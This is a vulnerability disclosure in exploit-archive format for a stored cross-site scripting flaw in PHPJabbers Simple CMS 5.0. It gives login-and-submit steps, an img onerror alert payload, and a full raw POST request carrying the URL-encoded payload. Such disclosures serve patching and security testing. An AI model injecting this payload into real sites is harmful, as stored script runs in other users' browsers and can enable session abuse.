PHPJabbers Simple CMS 5.0 Cross Site Scripting

# Exploit Title: PHPJabbers Simple CMS V5.0 - Stored Cross-Site Scripting (XSS)# Date: 2023-04-29# Exploit Author: Ahmet Ümit BAYRAM# Vendor Homepage: https://www.phpjabbers.com/faq.php# Software Link: https://www.phpjabbers.com/simple-cms/# Version: 5.0# Tested on: Kali Linux### Steps to Reproduce ###- Please login from this address:https://localhost/simplecms/index.php?controller=pjAdmin&action=pjActionLogin- Click on the "Add Section" button.- Then enter the payload ("><img src=x onerror=alert("Stored")>) in the"Section" box and save it.- Boom! An alert message saying "Stored" will appear in front of you.### PoC Request ###POST /simplecms/index.php?controller=pjAdminSections&action=pjActionCreateHTTP/1.1Host: localhostCookie: pj_sid=PJ1.0.6199026527.1682777172;pj_so=PJ1.0.6771252593.1682777172; pjd_1682777220_628=1;PHPSESSID=bmannt0kqjm2m0vmb5vj1dbu57; simpleCMS=ejrnh4bmb0ems1j4e4r9fq4eq1;pjd=7l9bb4ubmknrdbns46j7g5cqn7User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101Firefox/102.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 371Origin: https://localhostReferer:https://localhost/simplecms/index.php?controller=pjAdminSections&action=pjActionCreateUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailersConnection: closesection_create=1&i18n%5B1%5D%5Bsection_name%5D=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28%22Stored%22%29%3E&i18n%5B2%5D%5Bsection_name%5D=&i18n%5B3%5D%5Bsection_name%5D=&i18n%5B1%5D%5Bsection_content%5D=%3Cp%3E%22%26gt%3B%26lt%3Bimg+src%3Dx+onerror%3Dalert%28%22Stored%22%29%26gt%3B%3C%2Fp%3E&i18n%5B2%5D%5Bsection_content%5D=&i18n%5B3%5D%5Bsection_content%5D=&url=&status=T